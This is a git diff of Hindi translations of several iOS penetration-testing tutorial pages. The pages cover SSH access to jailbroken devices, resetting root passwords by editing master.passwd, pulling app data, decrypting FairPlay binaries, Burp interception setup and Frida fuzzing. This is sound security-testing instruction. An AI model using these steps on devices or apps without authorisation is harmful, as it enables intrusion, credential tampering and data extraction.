- [https://www.slideshare.net/RyanISI/ios-appsecurityminicourse](https://www.slideshare.net/RyanISI/ios-appsecurityminicourse)
- [https://github.com/prateek147/DVIA](https://github.com/prateek147/DVIA)

20
src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
View File

@ -40,13 +40,13 @@ $ ssh -p 2222 root@localhost
```
**ऑन-डिवाइस शेल एप्लिकेशन**, जैसे NewTerm 2, सीधे डिवाइस इंटरैक्शन को सुविधाजनक बनाते हैं, जो समस्या निवारण के लिए विशेष रूप से उपयोगी होते हैं। **रिवर्स SSH शेल** भी होस्ट कंप्यूटर से दूरस्थ पहुंच के लिए स्थापित किए जा सकते हैं।
### **भूल गए पासवर्ड को रीसेट करना**
### **भूल गए पासवर्ड रीसेट करना**
भूल गए पासवर्ड को डिफ़ॉल्ट (`alpine`) पर रीसेट करने के लिए, `/private/etc/master.passwd` फ़ाइल को संपादित करना आवश्यक है। इसमें मौजूदा हैश को `root` और `mobile` उपयोगकर्ता प्रविष्टियों के बगल में `alpine` के लिए हैश के साथ बदलना शामिल है।
## **डेटा ट्रांसफर तकनीकें**
### **ऐप डेटा फ़ाइलों को स्थानांतरित करना**
### **ऐप डेटा फ़ाइलें स्थानांतरित करना**
**SSH और SCP के माध्यम से आर्काइविंग और पुनर्प्राप्ति:** एप्लिकेशन के डेटा निर्देशिका को `tar` का उपयोग करके आर्काइव करना और फिर `scp` का उपयोग करके स्थानांतरित करना सीधा है। नीचे दिया गया कमांड डेटा निर्देशिका को .tgz फ़ाइल में आर्काइव करता है, जिसे फिर डिवाइस से खींचा जाता है:
```bash
@ -60,7 +60,7 @@ scp -P 2222 root@localhost:/tmp/data.tgz .
### **फ़ाइल प्रबंधन के लिए Objection का उपयोग करना**
**Objection के साथ इंटरएक्टिव शेल:** Objection लॉन्च करने से एक ऐप के Bundle निर्देशिका तक पहुँच मिलती है। यहाँ से, आप ऐप के Documents निर्देशिका में नेविगेट कर सकते हैं और फ़ाइलों का प्रबंधन कर सकते हैं, जिसमें उन्हें iOS उपकरण पर डाउनलोड और अपलोड करना शामिल है।
**Objection के साथ इंटरएक्टिव शेल:** Objection लॉन्च करने से एक ऐप के Bundle निर्देशिका तक पहुँच मिलती है। यहाँ से, आप ऐप के Documents निर्देशिका में नेविगेट कर सकते हैं और फ़ाइलों का प्रबंधन कर सकते हैं, जिसमें उन्हें iOS उपकरण से डाउनलोड और अपलोड करना शामिल है।
```bash
objection --gadget com.apple.mobilesafari explorer
cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents
@ -70,7 +70,7 @@ file download <filename>
### **IPA फ़ाइल प्राप्त करना**
**ओवर-दी-एयर (OTA) वितरण लिंक:** परीक्षण के लिए OTA के माध्यम से वितरित ऐप्स को ITMS सेवाओं के एसेट डाउनलोडर टूल का उपयोग करके डाउनलोड किया जा सकता है, जिसे npm के माध्यम से स्थापित किया गया है और स्थानीय रूप से IPA फ़ाइल को सहेजने के लिए उपयोग किया जाता है।
**ओवर-दी-एयर (OTA) वितरण लिंक:** OTA के माध्यम से परीक्षण के लिए वितरित ऐप्स को ITMS सेवाओं के एसेट डाउनलोडर टूल का उपयोग करके डाउनलोड किया जा सकता है, जिसे npm के माध्यम से स्थापित किया गया है और स्थानीय रूप से IPA फ़ाइल को सहेजने के लिए उपयोग किया जाता है।
```bash
npm install -g itms-services
itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa
@ -82,7 +82,7 @@ itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-so
### **डिक्रिप्शन प्रक्रिया**
**मैनुअल डिक्रिप्शन अवलोकन:** iOS ऐप बाइनरी को Apple द्वारा FairPlay का उपयोग करके एन्क्रिप्ट किया गया है। रिवर्स-इंजीनियर करने के लिए, एक को मेमोरी से डिक्रिप्टेड बाइनरी को डंप करना होगा। डिक्रिप्शन प्रक्रिया में PIE फ्लैग की जांच करना, मेमोरी फ्लैग को समायोजित करना, एन्क्रिप्टेड सेक्शन की पहचान करना, और फिर इस सेक्शन को इसके डिक्रिप्टेड रूप के साथ डंप और बदलना शामिल है।
**मैनुअल डिक्रिप्शन अवलोकन:** iOS ऐप बाइनरी को Apple द्वारा FairPlay का उपयोग करके एन्क्रिप्ट किया गया है। रिवर्स-इंजीनियरिंग के लिए, एक को मेमोरी से डिक्रिप्टेड बाइनरी को डंप करना होगा। डिक्रिप्शन प्रक्रिया में PIE फ्लैग की जांच करना, मेमोरी फ्लैग को समायोजित करना, एन्क्रिप्टेड सेक्शन की पहचान करना, और फिर इस सेक्शन को इसके डिक्रिप्टेड रूप के साथ डंप और बदलना शामिल है।
**PIE फ्लैग की जांच और संशोधन:**
```bash
@ -103,19 +103,19 @@ dump memory dump.bin 0x8000 0x10a4000
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
**डिक्रिप्शन को अंतिम रूप देना:** बाइनरी के मेटाडेटा को संशोधित करें ताकि एन्क्रिप्शन की अनुपस्थिति को इंगित किया जा सके, जैसे कि **MachOView** का उपयोग करते हुए, `cryptid` को 0 पर सेट करें।
**अंतिम डिक्रिप्शन:** बाइनरी के मेटाडेटा को संशोधित करें ताकि एन्क्रिप्शन की अनुपस्थिति को इंगित किया जा सके, जैसे कि **MachOView** का उपयोग करते हुए, `cryptid` को 0 पर सेट करें।
### **डिक्रिप्शन (स्वचालित रूप से)**
#### **frida-ios-dump**
[**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) उपकरण का उपयोग **iOS उपकरणों से स्वचालित रूप से ऐप्स को डिक्रिप्ट और निकालने** के लिए किया जाता है। प्रारंभ में, `dump.py` को iOS उपकरण से कनेक्ट करने के लिए कॉन्फ़िगर करना आवश्यक है, जिसे **iproxy** के माध्यम से localhost पर पोर्ट 2222 के माध्यम से या सीधे उपकरण के IP पते और पोर्ट के माध्यम से किया जा सकता है।
[**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) उपकरण का उपयोग **iOS उपकरणों से ऐप्स को स्वचालित रूप से डिक्रिप्ट और निकालने** के लिए किया जाता है। प्रारंभ में, `dump.py` को iOS उपकरण से कनेक्ट करने के लिए कॉन्फ़िगर करना आवश्यक है, जिसे **iproxy** के माध्यम से लोकलहोस्ट पर पोर्ट 2222 के माध्यम से या सीधे उपकरण के IP पते और पोर्ट के माध्यम से किया जा सकता है।
उपकरण पर स्थापित ऐप्स को सूचीबद्ध करने के लिए कमांड का उपयोग किया जा सकता है:
```bash
$ python dump.py -l
```
एक विशिष्ट ऐप, जैसे कि Telegram, को डंप करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
विशिष्ट ऐप, जैसे कि Telegram, को डंप करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
```bash
$ python3 dump.py -u "root" -p "<PASSWORD>" ph.telegra.Telegraph
```
@ -142,7 +142,7 @@ bagbak --raw Chrome
### **ऐप्स इंस्टॉल करना**
**Sideloading** का अर्थ है आधिकारिक ऐप स्टोर के बाहर एप्लिकेशन इंस्टॉल करना। यह प्रक्रिया **installd daemon** द्वारा संभाली जाती है और इसके लिए ऐप्स को Apple द्वारा जारी किए गए सर्टिफिकेट के साथ साइन किया जाना आवश्यक है। जेलब्रोकन डिवाइस इस प्रक्रिया को **AppSync** के माध्यम से बायपास कर सकते हैं, जो नकली-साइन किए गए IPA पैकेजों की इंस्टॉलेशन की अनुमति देता है।
**Sideloading** का अर्थ है आधिकारिक App Store के बाहर एप्लिकेशन इंस्टॉल करना। यह प्रक्रिया **installd daemon** द्वारा संभाली जाती है और इसके लिए ऐप्स को Apple द्वारा जारी किए गए सर्टिफिकेट के साथ साइन किया जाना आवश्यक है। जेलब्रोकन डिवाइस इस प्रक्रिया को **AppSync** के माध्यम से बायपास कर सकते हैं, जो नकली-साइन किए गए IPA पैकेजों की स्थापना की अनुमति देता है।
#### **Sideloading टूल्स**
@ -154,7 +154,7 @@ bagbak --raw Chrome
- **ios-deploy**: macOS उपयोगकर्ताओं के लिए, ios-deploy कमांड लाइन से iOS ऐप्स इंस्टॉल करता है। IPA को अनज़िप करना और सीधे ऐप लॉन्च के लिए `-m` फ्लैग का उपयोग करना प्रक्रिया का हिस्सा है।
- **Xcode**: Xcode का उपयोग करके ऐप्स इंस्टॉल करने के लिए **Window/Devices and Simulators** पर जाएं और ऐप को **Installed Apps** में जोड़ें।
- **Xcode**: Xcode का उपयोग करके ऐप्स को इंस्टॉल करने के लिए **Window/Devices and Simulators** पर जाएं और ऐप को **Installed Apps** में जोड़ें।
#### **गैर-iPad डिवाइस पर एप्लिकेशन इंस्टॉलेशन की अनुमति दें**

24
src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
View File

@ -4,48 +4,48 @@
## Installing the Burp Certificate on iOS Devices
iOS उपकरणों पर सुरक्षित वेब ट्रैफ़िक विश्लेषण और SSL पिनिंग के लिए, Burp Suite का उपयोग **Burp Mobile Assistant** के माध्यम से या मैन्युअल कॉन्फ़िगरेशन के माध्यम से किया जा सकता है। नीचे दोनों विधियों पर एक संक्षिप्त मार्गदर्शिका दी गई है:
सुरक्षित वेब ट्रैफ़िक विश्लेषण और iOS उपकरणों पर SSL पिनिंग के लिए, Burp Suite का उपयोग **Burp Mobile Assistant** के माध्यम से या मैनुअल कॉन्फ़िगरेशन के माध्यम से किया जा सकता है। नीचे दोनों विधियों पर एक संक्षिप्त मार्गदर्शिका दी गई है:
### Automated Installation with Burp Mobile Assistant
**Burp Mobile Assistant** Burp Certificate, प्रॉक्सी कॉन्फ़िगरेशन, और SSL Pinning की स्थापना प्रक्रिया को सरल बनाता है। विस्तृत मार्गदर्शन [PortSwigger's official documentation](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) पर पाया जा सकता है।
**Burp Mobile Assistant** Burp Certificate, प्रॉक्सी कॉन्फ़िगरेशन और SSL पिनिंग की स्थापना प्रक्रिया को सरल बनाता है। विस्तृत मार्गदर्शन [PortSwigger के आधिकारिक दस्तावेज़](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) पर पाया जा सकता है।
### Manual Installation Steps
1. **Proxy Configuration:** iPhone की Wi-Fi सेटिंग्स के तहत Burp को प्रॉक्सी के रूप में सेट करें।
2. **Certificate Download:** अपने डिवाइस के ब्राउज़र में `http://burp` पर जाएं और सर्टिफिकेट डाउनलोड करें।
3. **Certificate Installation:** **Settings** > **General** > **VPN & Device Management** के माध्यम से डाउनलोड किए गए प्रोफ़ाइल को इंस्टॉल करें, फिर **Certificate Trust Settings** के तहत PortSwigger CA के लिए ट्रस्ट सक्षम करें।
2. **Certificate Download:** अपने उपकरण के ब्राउज़र पर `http://burp` पर जाएं और प्रमाणपत्र डाउनलोड करें।
3. **Certificate Installation:** डाउनलोड किए गए प्रोफ़ाइल को **Settings** > **General** > **VPN & Device Management** के माध्यम से स्थापित करें, फिर **Certificate Trust Settings** के तहत PortSwigger CA के लिए विश्वास सक्षम करें।
### Configuring an Interception Proxy
यह सेटअप Burp के माध्यम से iOS डिवाइस और इंटरनेट के बीच ट्रैफ़िक विश्लेषण की अनुमति देता है, जिसके लिए एक Wi-Fi नेटवर्क की आवश्यकता होती है जो क्लाइंट-से-क्लाइंट ट्रैफ़िक का समर्थन करता है। यदि उपलब्ध नहीं है, तो usbmuxd के माध्यम से USB कनेक्शन एक विकल्प के रूप में कार्य कर सकता है। PortSwigger के ट्यूटोरियल [डिवाइस कॉन्फ़िगरेशन](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) और [सर्टिफिकेट इंस्टॉलेशन](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device) पर विस्तृत निर्देश प्रदान करते हैं।
यह सेटअप Burp के माध्यम से iOS उपकरण और इंटरनेट के बीच ट्रैफ़िक विश्लेषण की अनुमति देता है, जिसके लिए एक Wi-Fi नेटवर्क की आवश्यकता होती है जो क्लाइंट-से-क्लाइंट ट्रैफ़िक का समर्थन करता है। यदि उपलब्ध नहीं है, तो usbmuxd के माध्यम से USB कनेक्शन एक विकल्प के रूप में कार्य कर सकता है। PortSwigger के ट्यूटोरियल [डिवाइस कॉन्फ़िगरेशन](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) और [प्रमाणपत्र स्थापना](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device) पर गहन निर्देश प्रदान करते हैं।
### Advanced Configuration for Jailbroken Devices
जेलब्रोकन उपकरणों वाले उपयोगकर्ताओं के लिए, USB (के माध्यम से **iproxy**) पर SSH एक विधि प्रदान करता है जिससे ट्रैफ़िक को सीधे Burp के माध्यम से रूट किया जा सकता है:
जेलब्रोकन उपकरणों वाले उपयोगकर्ताओं के लिए, USB के माध्यम से SSH ( **iproxy** के माध्यम से) एक विधि प्रदान करता है जिससे ट्रैफ़िक को सीधे Burp के माध्यम से रूट किया जा सकता है:
1. **Establish SSH Connection:** iproxy का उपयोग करके SSH को localhost पर फॉरवर्ड करें, जिससे iOS डिवाइस से Burp चला रहे कंप्यूटर से कनेक्शन की अनुमति मिलती है।
1. **Establish SSH Connection:** iproxy का उपयोग करके SSH को localhost पर अग्रेषित करें, जिससे iOS उपकरण से Burp चला रहे कंप्यूटर से कनेक्शन की अनुमति मिलती है।
```bash
iproxy 2222 22
```
2. **Remote Port Forwarding:** iOS डिवाइस के पोर्ट 8080 को कंप्यूटर के localhost पर फॉरवर्ड करें ताकि Burp के इंटरफेस तक सीधे पहुंच सक्षम हो सके।
2. **Remote Port Forwarding:** iOS उपकरण के पोर्ट 8080 को कंप्यूटर के localhost पर अग्रेषित करें ताकि Burp के इंटरफ़ेस तक सीधी पहुंच सक्षम हो सके।
```bash
ssh -R 8080:localhost:8080 root@localhost -p 2222
```
3. **Global Proxy Setting:** अंत में, iOS डिवाइस की Wi-Fi सेटिंग्स को मैन्युअल प्रॉक्सी का उपयोग करने के लिए कॉन्फ़िगर करें, जिससे सभी वेब ट्रैफ़िक Burp के माध्यम से निर्देशित हो सके।
3. **Global Proxy Setting:** अंत में, iOS उपकरण की Wi-Fi सेटिंग्स को मैनुअल प्रॉक्सी का उपयोग करने के लिए कॉन्फ़िगर करें, जिससे सभी वेब ट्रैफ़िक Burp के माध्यम से निर्देशित हो सके।
### Full Network Monitoring/Sniffing
गैर-HTTP डिवाइस ट्रैफ़िक की निगरानी **Wireshark** का उपयोग करके प्रभावी ढंग से की जा सकती है, जो सभी प्रकार के डेटा ट्रैफ़िक को कैप्चर करने में सक्षम एक उपकरण है। iOS उपकरणों के लिए, रीयल-टाइम ट्रैफ़िक निगरानी एक Remote Virtual Interface बनाने के माध्यम से सक्षम की जाती है, जिसकी प्रक्रिया [इस Stack Overflow पोस्ट](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) में विस्तृत है। शुरू करने से पहले, macOS सिस्टम पर **Wireshark**ा इंस्टॉलेशन एक पूर्वापेक्षा है।
गैर-HTTP डिवाइस ट्रैफ़िक की निगरानी **Wireshark** का उपयोग करके प्रभावी ढंग से की जा सकती है, जो सभी प्रकार के डेटा ट्रैफ़िक को कैप्चर करने में सक्षम एक उपकरण है। iOS उपकरणों के लिए, वास्तविक समय ट्रैफ़िक निगरानी एक Remote Virtual Interface बनाने के माध्यम से सक्षम की जाती है, जिसकी प्रक्रिया [इस Stack Overflow पोस्ट](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) में विस्तृत है। शुरू करने से पहले, macOS सिस्टम पर **Wireshark**ी स्थापना एक पूर्वापेक्षा है।
इस प्रक्रिया में कई प्रमुख चरण शामिल हैं:
1. iOS डिवाइस और macOS होस्ट के बीच USB के माध्यम से एक कनेक्शन शुरू करें।
2. iOS डिवाइस का **UDID** सुनिश्चित करें, जो ट्रैफ़िक निगरानी के लिए आवश्यक कदम है। यह macOS टर्मिनल में एक कमांड निष्पादित करके किया जा सकता है:
1. iOS उपकरण और macOS होस्ट के बीच USB के माध्यम से एक कनेक्शन शुरू करें।
2. iOS उपकरण का **UDID** सुनिश्चित करें, जो ट्रैफ़िक निगरानी के लिए आवश्यक है। यह macOS टर्मिनल में एक कमांड निष्पादित करके किया जा सकता है:
```bash
$ rvictl -s <UDID>
Starting device <UDID> [SUCCEEDED] with interface rvi0

14
src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
View File

@ -6,13 +6,13 @@ Summary of the page [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-
### **Extracting Entitlements and Mobile Provision Files**
जब क ऐप के IPA या जेलब्रोकन डिवाइस पर स्थापित ऐप के साथ काम कर रहे हों, तो सीधे `.entitlements` फ़ाइलें या `embedded.mobileprovision` फ़ाइल खोजना संभव नहीं हो सकता है। हालाँकि, ऐप बाइनरी से एंटाइटलमेंट प्रॉपर्टी लिस्ट को अभी भी निकाला जा सकता है, "iOS Basic Security Testing" अध्याय में वर्णित प्रक्रियाओं का पालन करते हुए, विशेष रूप से "Acquiring the App Binary" अनुभाग।
जब किसी ऐप के IPA या जेलब्रोकन डिवाइस पर इंस्टॉल किए गए ऐप के साथ काम कर रहे हों, तो सीधे `.entitlements` फ़ाइलें या `embedded.mobileprovision` फ़ाइल खोजना संभव नहीं हो सकता। हालाँकि, ऐप बाइनरी से एंटाइटलमेंट प्रॉपर्टी लिस्ट को अभी भी निकाला जा सकता है, "iOS Basic Security Testing" अध्याय में वर्णित प्रक्रियाओं का पालन करते हुए, विशेष रूप से "Acquiring the App Binary" अनुभाग।
एन्क्रिप्टेड बाइनरी के साथ भी, इन फ़ाइलों को निकालने के लिए कुछ कदम उठाए जा सकते हैं। यदि ये कदम विफल होते हैं, तो Clutch जैसे उपकरण (यदि iOS संस्करण के साथ संगत हो), frida-ios-dump, या समान उपयोगिताएँ ऐप को डिक्रिप्ट और निकालने के लिए आवश्यक हो सकती हैं
एन्क्रिप्टेड बाइनरी के साथ भी, इन फ़ाइलों को निकालने के लिए कुछ कदम उठाए जा सकते हैं। यदि ये कदम विफल होते हैं, तो Clutch (यदि iOS संस्करण के साथ संगत हो), frida-ios-dump, या समान उपयोगिताओं की आवश्यकता हो सकती है ऐप को डिक्रिप्ट और निकालने के लिए।
#### **Extracting the Entitlements Plist from the App Binary**
जब ऐप बाइनरी एक कंप्यूटर पर सुलभ हो, तो **binwalk** का उपयोग सभी XML फ़ाइलों को निकालने के लिए किया जा सकता है। नीचे दिए गए कमांड से ऐसा करने का तरीका दर्शाया गया है:
जब ऐप बाइनरी कंप्यूटर पर उपलब्ध हो, तो **binwalk** का उपयोग सभी XML फ़ाइलों को निकालने के लिए किया जा सकता है। नीचे दिए गए कमांड से ऐसा करने का तरीका दर्शाया गया है:
```bash
$ binwalk -e -y=xml ./Telegram\ X
@ -21,21 +21,21 @@ DECIMAL HEXADECIMAL DESCRIPTION
1430180 0x15D2A4 XML document, version: "1.0"
1458814 0x16427E XML document, version: "1.0"
```
वैकल्पिक रूप से, **radare2** का उपयोग एक कमांड को चुपचाप चलाने और बाहर निकलने के लिए किया जा सकता है, जो ऐप बाइनरी में "PropertyList" वाले सभी स्ट्रिंग्स की खोज करता है:
वैकल्पिक रूप से, **radare2** का उपयोग एक कमांड को चुपचाप चलाने और बाहर निकलने के लिए किया जा सकता है, ऐप बाइनरी में "PropertyList" वाले सभी स्ट्रिंग्स की खोज करते हुए:
```bash
$ r2 -qc 'izz~PropertyList' ./Telegram\ X
0x0015d2a4 ascii <?xml version="1.0" encoding="UTF-8" standalone="yes"?>...
0x0016427d ascii H<?xml version="1.0" encoding="UTF-8"?>...
```
दोनों विधियाँ, binwalk और radare2, `plist` फ़ाइलों को निकालने की अनुमति देती हैं, जिसमें पहले वाले (0x0015d2a4) की जांच करने पर [Telegram से मूल अधिकार फ़ाइल की सफल वसूली](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements) का पता चलता है।
दोनों विधियाँ, binwalk और radare2, `plist` फ़ाइलों को निकालने की अनुमति देती हैं, जिसमें पहले वाले (0x0015d2a4) की जांच करने पर [Telegram से मूल अधिकार फ़ाइल की सफल पुनर्प्राप्ति](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements) का पता चलता है।
जेलब्रोकन उपकरणों पर पहुँचे गए ऐप बाइनरी के लिए (जैसे, SSH के माध्यम से), **grep** कमांड के साथ `-a, --text` ध्वज का उपयोग सभी फ़ाइलों को ASCII पाठ के रूप में मानने के लिए किया जा सकता है:
```bash
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/...
```
`-A num, --after-context=num` फ्लैग को समायोजित करने से अधिक या कम लाइनों को प्रदर्शित करने की अनुमति मिलती है। यह विधि एन्क्रिप्टेड ऐप बाइनरी के लिए भी व्यवहार्य है और इसे कई ऐप स्टोर ऐप्स के खिलाफ सत्यापित किया गया है। पहले उल्लेखित उपकरणों का उपयोग जेलब्रोकन iOS उपकरणों पर समान उद्देश्यों के लिए भी किया जा सकता है।
`-A num, --after-context=num` ध्वज को समायोजित करने से अधिक या कम पंक्तियों को प्रदर्शित करने की अनुमति मिलती है। यह विधि एन्क्रिप्टेड ऐप बाइनरी के लिए भी व्यवहार्य है और इसे कई ऐप स्टोर ऐप्स के खिलाफ सत्यापित किया गया है। पहले उल्लेखित उपकरणों का उपयोग जेलब्रोकन iOS उपकरणों पर समान उद्देश्यों के लिए भी किया जा सकता है।
**नोट**: इस कार्य के लिए `strings` कमांड का प्रत्यक्ष उपयोग इसकी सीमाओं के कारण अनुशंसित नहीं है। इसके बजाय, बाइनरी पर `-a` फ्लैग के साथ grep का उपयोग करना या अधिक प्रभावी परिणामों के लिए radare2 (`izz`)/rabin2 (`-zz`) का उपयोग करना उचित है।
**नोट**: इस कार्य के लिए `strings` कमांड का प्रत्यक्ष उपयोग इसकी सीमाओं के कारण अनुशंसित नहीं है। इसके बजाय, बाइनरी पर `-a` ध्वज के साथ grep का उपयोग करना या अधिक प्रभावी परिणामों के लिए radare2 (`izz`)/rabin2 (`-zz`) का उपयोग करना उचित है।
{{#include ../../banners/hacktricks-training.md}}

8
src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View File

@ -277,7 +277,7 @@ this.target_function(this.wg_log_global_ptr, this.tag, this.payload)
const f = new WGLogFuzzer()
rpc.exports.fuzzer = f
```
- **फज़्ज़र** को **संकलित** करें:
- **फज़्ज़र** को संकलित करें:
```bash
# From inside fpicker clone
## Compile from "myfuzzer.js" to "harness.js"
@ -290,11 +290,11 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
# You can find code coverage and crashes in examples/wg-log/out/
```
> [!CAUTION]
> इस मामले में हम **हर payload के बाद ऐप को पुनरारंभ या स्थिति को पुनर्स्थापित नहीं कर रहे हैं**। इसलिए, यदि Frida को **क्रैश** मिलता है, तो उस payload के बाद के **अगले इनपुट** भी **ऐप को क्रैश** कर सकते हैं (क्योंकि ऐप अस्थिर स्थिति में है) भले ही **इनपुट को ऐप को क्रैश नहीं करना चाहिए**।
> इस मामले में हम **हर payload के बाद ऐप को फिर से शुरू नहीं कर रहे हैं या स्थिति को बहाल नहीं कर रहे हैं**। इसलिए, यदि Frida एक **crash** पाती है, तो उसके बाद के **inputs** भी ऐप को **crash** कर सकते हैं (क्योंकि ऐप अस्थिर स्थिति में है) भले ही **input को ऐप को crash नहीं करना चाहिए**।
>
> इसके अलावा, Frida iOS के अपवाद संकेतों में हुक करेगा, इसलिए जब **Frida को क्रैश मिलता है**, तो शायद **iOS क्रैश रिपोर्ट उत्पन्न नहीं होगी**।
> इसके अलावा, Frida iOS के अपवाद संकेतों में हुक करेगा, इसलिए जब **Frida एक crash पाती है**, तो शायद **iOS crash रिपोर्ट उत्पन्न नहीं होगी**।
>
> इसे रोकने के लिए, उदाहरण के लिए, हम हर Frida क्रैश के बाद ऐप को पुनरारंभ कर सकते हैं।
> इसे रोकने के लिए, उदाहरण के लिए, हम हर Frida crash के बाद ऐप को फिर से शुरू कर सकते हैं।
### Logs & Crashes

8
src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
View File

@ -8,7 +8,7 @@
- **शेयर**: सामाजिक नेटवर्क या दूसरों के साथ सीधे साझा करने की अनुमति देता है।
- **आज (विजेट)**: सूचना केंद्र के आज दृश्य से जल्दी से सामग्री प्रदान करता है या कार्य करता है।
जब कोई उपयोगकर्ता इन एक्सटेंशनों के साथ संलग्न होता है, जैसे कि एक होस्ट ऐप से पाठ साझा करना, तो एक्सटेंशन इस इनपुट को अपने संदर्भ में संसाधित करता है, साझा की गई जानकारी का उपयोग करके अपना कार्य करता है, जैसा कि Apple के दस्तावेज़ में विस्तृत किया गया है।
जब क उपयोगकर्ता इन एक्सटेंशनों के साथ संलग्न होता है, जैसे कि एक होस्ट ऐप से पाठ साझा करना, तो एक्सटेंशन इस इनपुट को अपने संदर्भ में संसाधित करता है, साझा की गई जानकारी का उपयोग करके अपना कार्य करता है, जैसा कि एप्पल के दस्तावेज़ में विस्तृत किया गया है।
### **सुरक्षा विचार**
@ -23,7 +23,7 @@
#### **ऐप एक्सटेंशनों की पहचान करना**
स्रोत कोड में ऐप एक्सटेंशनों को खोजने के लिए, Xcode में `NSExtensionPointIdentifier` के लिए खोजें या एक्सटेंशन को इंगित करने वाले `.appex` फ़ाइलों के लिए ऐप बंडल का निरीक्षण करें। स्रोत कोड के बिना, इन पहचानकर्ताओं को ऐप बंडल के भीतर खोजने के लिए grep या SSH का उपयोग करें।
स्रोत कोड में ऐप एक्सटेंशनों को खोजने के लिए, Xcode में `NSExtensionPointIdentifier` के लिए खोजें या एक्सटेंशन को इंगित करने वाले `.appex` फ़ाइलों के लिए ऐप बंडल का निरीक्षण करें। बिना स्रोत कोड के, इन पहचानकर्ताओं को ऐप बंडल के भीतर खोजने के लिए grep या SSH का उपयोग करें।
#### **समर्थित डेटा प्रकार**
@ -31,7 +31,7 @@
#### **डेटा साझा करना**
एक ऐप और उसके एक्सटेंशन के बीच डेटा साझा करने के लिए एक साझा कंटेनर की आवश्यकता होती है, जिसे "ऐप समूहों" के माध्यम से सेट किया जाता है और `NSUserDefaults` के माध्यम से पहुँचा जाता है। यह साझा स्थान एक्सटेंशनों द्वारा शुरू किए गए बैकग्राउंड ट्रांसफर के लिए आवश्यक है।
एक ऐप और उसके एक्सटेंशन के बीच डेटा साझा करने के लिए एक साझा कंटेनर की आवश्यकता होती है, जिसे "ऐप समूहों" के माध्यम से सेटअप किया जाता है और `NSUserDefaults` के माध्यम से पहुँचा जाता है। यह साझा स्थान एक्सटेंशनों द्वारा शुरू किए गए बैकग्राउंड ट्रांसफर के लिए आवश्यक है।
#### **एक्सटेंशनों को प्रतिबंधित करना**
@ -41,7 +41,7 @@
गतिशील विश्लेषण में शामिल हैं:
- **साझा आइटमों का निरीक्षण करना**: साझा डेटा प्रकारों और उत्पत्ति को देखने के लिए `NSExtensionContext - inputItems` में हुक करें।
- **साझा आइटम का निरीक्षण करना**: साझा डेटा प्रकारों और उत्पत्ति को देखने के लिए `NSExtensionContext - inputItems` में हुक करें।
- **एक्सटेंशनों की पहचान करना**: आंतरिक तंत्र, जैसे `NSXPCConnection` को देख कर यह पता करें कि कौन से एक्सटेंशन आपके डेटा को संसाधित करते हैं।
`frida-trace` जैसे उपकरण अंतर्निहित प्रक्रियाओं को समझने में मदद कर सकते हैं, विशेष रूप से उन लोगों के लिए जो इंटर-प्रोसेस संचार के तकनीकी विवरण में रुचि रखते हैं।

26
src/mobile-pentesting/ios-pentesting/ios-basics.md
View File

@ -2,24 +2,24 @@
# विशेषाधिकार विभाजन और सैंडबॉक्स
iOS में, उपयोगकर्ता-सुलभ अनुप्रयोगों और प्रणाली के मुख्य प्रक्रियाओं के बीच विशेषाधिकार में भेद है। अनुप्रयोग **`mobile`** उपयोगकर्ता पहचान के तहत चलते हैं, जबकि महत्वपूर्ण प्रणाली प्रक्रियाएँ **`root`** के रूप में कार्य करती हैं। यह विभाजन एक सैंडबॉक्स तंत्र द्वारा बढ़ाया गया है, जो अनुप्रयोगों द्वारा किए जा सकने वाले कार्यों पर कड़े प्रतिबंध लगाता है। उदाहरण के लिए, भले ही अनुप्रयोग समान उपयोगकर्ता पहचान साझा करते हों, वे एक-दूसरे के डेटा तक पहुँचने या उसे संशोधित करने से प्रतिबंधित होते हैं।
iOS में, उपयोगकर्ता-सुलभ अनुप्रयोगों और प्रणाली के मुख्य प्रक्रियाओं के बीच विशेषाधिकार में एक भेद है। अनुप्रयोग **`mobile`** उपयोगकर्ता पहचान के तहत चलते हैं, जबकि महत्वपूर्ण प्रणाली प्रक्रियाएँ **`root`** के रूप में कार्य करती हैं। यह विभाजन एक सैंडबॉक्स तंत्र द्वारा बढ़ाया गया है, जो अनुप्रयोगों द्वारा किए जा सकने वाले कार्यों पर कड़े प्रतिबंध लगाता है। उदाहरण के लिए, भले ही अनुप्रयोग समान उपयोगकर्ता पहचान साझा करते हों, वे एक-दूसरे के डेटा तक पहुँचने या उसे संशोधित करने से प्रतिबंधित हैं।
